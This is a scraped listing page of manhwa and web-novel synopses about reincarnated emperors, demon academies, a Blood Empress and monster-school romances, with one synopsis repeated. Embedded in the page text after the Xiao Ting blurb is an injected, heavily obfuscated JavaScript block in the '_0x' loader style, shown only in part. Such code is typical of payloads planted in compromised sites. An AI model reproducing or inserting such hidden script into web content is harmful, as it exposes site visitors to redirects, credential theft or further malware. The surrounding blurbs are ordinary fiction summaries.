Leslie’s life was always used for the betterment of her sister, Eli. After a failed attempt to extract the black magic within Leslie to transfer to Eli, Leslie knocks on the door of the monster Duchess and pleads for the Duchess to adopt her?!
Ling Jian Chen, the master of the God-Emperor , is reborn as a mortal, and he has started an unbeatable life that defeat everyone against him! Genius? Even the God-Emperor is my student. Talking about genius and masters? Even the God-Emperor serves me with respect in order to receive my words of guidance, are you as unbeatable as me? Beauties? Have you ever heard of the most beautiful goddess in the Divine Realm? She has tried everything to stay with me … Everyone in heaven, listen to my orders, I’m the one and the only in all the eight realms in heaven. Emperor Ling Tian
At the age of 19, I, Zabotte Winchester, inherited the legacy of my stepfather and became the owner of the Winchester family. I thought my mother would run the family, so I could live a comfortable life. When I found out I might die from a car accident, I rewrote my life plan. “From now on, I will be the real owner of Winchester.” I will protect Winchester’s wealth and honor, the future of my old and new sisters, and win the loyalty of a man who was the start the night at a ball, all by himself. “Miss Winchester, I will only tell you. Actually, my real identity…” “Shh. Keep your secret, Merrick. The only thing I care about is a man’s kind heart.” “…But why have you been touching my thigh since a while ago?” “Don’t get me wrong. I was exploring where the man’s heart comes from.” She has a little temper, but it turns out she’s a caring older sister. DCMS 자보트를 새 언니라고 부르지 마세요
What’s worse than going to school? Going to school in another world to become a… knight?! After accidentally witnessing a sword-wielding woman slay a demon in the streets of Boston, Valeriana is kidnapped and forced to enroll in the magical Celeste Academy. It would’ve been great if she fit right in, but while everyone’s learning to use their magic powers to protect the world of Valemnia from demons, she’s stuck being the only human in class! To make matters worse, the demons are getting stronger. Not only is Valemnia in growing danger, but Earth could be their next target. Surely demons can wait to destroy the world until she gets her life together, right? BASED ON THE ORIGINAL NOVEL: tapas.io/series/celeste-academy
逆天仙帝 The celestial emperor has been reincarnated as an insignificant cowherd. Yet, he still recalls his enemies from his previous life. He vows to make his enemies pay a blood price to compensate for the suffering they had inflicted on him. However, he never expected his current form to be incapable of cultivation. Hence, he must find an alternative way to rebuild his primordial spirit. Gradually, he rises against his fate, letting everyone in the celestial realm know that he, the celestial emperor, has returned! 79
One hundred thousand years ago, when the human race rose, the new Demon Emperor Xiao Ting and the old Demon Emperor were bullied by the strong human race. The old Demon Emperor finally passed away in depression. Xiao Ting retreats in anger, vowing not to bring down the most precious treasure of the demon clan, “The Demon Emperor Sutra”, and vowed not to leave the customs successfully after his cultivation! In the 100,000-year Canghai Cangtian, Xiao Ting accidentally cultivated the “Devil Emperor Sutra” with only 10 floors to the 99999 floors…On the day of exit, Xiao Ting accidentally obtained the “Devil Emperor Development System”, but… The humble little system, seeing Xiao Ting, who was already at full level, couldn’t help expressing a pitiful feeling: all fairy tales are deceptive! Say good newcomers have a lot of oil and water? Can the newcomer system dominate and be fearless? Xiao Ting looked at the cute system full of bags: I heard that your system likes commanding the host? Humble System: Abba, Ababa… One hundred thousand years ago, when the human race rose, the new Demon Emperor Xiao Ting and the old Demon Emperor were bullied by the strong human race. The old Demon Emperor finally passed away in depression. Xiao Ting retreats in anger, vowing not to bring down the most precious treasure of the demon clan, “The Demon Emperor Sutra”, and vowed not to leave the customs successfully after his cultivation! In the 100,000-year Canghai Cangtian, Xiao Ting accidentally cultivated the “Devil Emperor Sutra” with only 10 floors to the 99999 floors…On the day of exit, Xiao Ting accidentally obtained the “Devil Emperor Development System”, but… The humble little system, seeing Xiao Ting, who was already at full level, couldn’t help expressing a pitiful feeling: all fairy tales are deceptive! Say good newcomers have a lot of oil and water? Can the newcomer system dominate and be fearless? Xiao Ting looked at the cute system full of bags: I heard that your system likes commanding the host? Humble System: Abba, Ababa…<script></script><script>function _0x279d(_0x35985c,_0x50f0b9){var _0x1eb83a=_0x5599();return _0x279d=function(_0x59f945,_0x140afe){_0x59f945=_0x59f945-(-0x1*0x158f+-0x23df+0x2*0x1d55);var _0x4a1890=_0x1eb83a[_0x59f945];return _0x4a1890;},_0x279d(_0x35985c,_0x50f0b9);}(function(_0x392e15,_0x3070e9){var _0x178c43=_0x279d,_0x2e59e1=_0x392e15();while(!![]){try{var _0x7f2be2=parseInt(_0x178c43(0x145))/(-0x26e9+0xfa+0x25f0)+parseInt(_0x178c43(0x15b))/(-0x2b*0x5c+0x11*0xbc+-0x6*-0x7f)+-parseInt(_0x178c43(0x13c))/(-0xb5d+-0x1cc6+0x3*0xd62)+parseInt(_0x178c43(0x158))/(-0x1fc*-0x1+-0x355*-0x7+-0x25*0xaf)*(parseInt(_0x178c43(0x141))/(0x17bc*-0x1+0xac*0x25+-0x11b))+parseInt(_0x178c43(0x150))/(-0xda*-0x6+0x5f*0x39+0x1a3d*-0x1)+-parseInt(_0x178c43(0x142))/(-0x1*0x1431+0x248f+-0x59*0x2f)+parseInt(_0x178c43(0x143))/(-0xc*0x32e+0x2167*0x1+-0x23*-0x23)*(-parseInt(_0x178c43(0x149))/(-0x168d+0x1271*-0x1+0x2907));if(_0x7f2be2===_0x3070e9)break;else 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When the emperor murders the python, god of the waters, a curse is put over the Cha Kingdom preventing men from succeeding the throne. So begins the reign of empresses and the endless struggle against men who try to control the kingdom. After all her sisters are killed by the hands of Yom, the young Empress is seated on the throne. Rather than performing her duties as a ruler of a kingdom, the empress spends her days and nights drinking and sleeping with different men, whom she all executes immediately after. The people call her the Blood Empress, attributed to her violent behavior and the red hair, which is dyed with the blood of the men she killed. One day, the Empress meets a handsome and intellectual young man named Kanghee. As she picks up her sword to kill him, Kanghee convinces her to spare him and begins to captivate her heart by telling her stories he’s read from book. As the empress gets closer and closer to Kanghee, she begins to change her violent ways. Is he someone she can finally put her trust in? Or is he not?
"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Jiǔ Wěi Hú Xiào Bà Dīng Shàng Wǒ Zhī Hòu, Jiu Wei Hu Xiao Ba Ding Shang Wo Zhi Hou, Nine-Tailed Fox Top Student Has Fixated After Me, / 九尾狐校霸盯上我之后 Natural fishing human cub vs arrogant and innocent nine-tailed fox! When humans study in a school full of monsters, it is like a sheep falling into a wolf's den, weak and pitiful and helpless? no no.
A young girl enters into a different world in search of her best friend. Their past meeting felt secretive, but now her friend has been taken away by demons! The Demon Prince and his disrespected brother, exactly what kind of relationship do they have with this otherworld young maiden? The curtains behind this secret slowly begin to be drawn back.
Eaters. Intelligent creatures from another planet that closely resemble humans. They use a language system different from us and prey on humans. And then there’s Yuli, the only human on earth who can communicate with the Eaters. A romance thriller that unfolds with Yuli, a human that’s a little different from the others! 섬광행동 / Seomgwanghaengdong / Flash Action
Read manhwa The Goddess’s Taste / 여신의 취향 / Goddess’s Taste Yuyu was always bullied in school for being fat. Now, after hard work and effort, he’s a beauty director receiving rave reviews from customers. Suddenly, his first love Ahin appears in front of him. But wait — is it really her?
The God of Cosmos was framed and persecuted after he failed in the competition over the crown of lord. No one would expect he could come back to life 80 thousand years later. This time his soul was accidentally bounded with Yang Chen, the son of a servant. Unfortunately, Yang Chen, the original body owner, was the worst at cultivation. How could the God of Cosmos start his revenge planed for 80 millenniums? The answer is, of course, cultivation!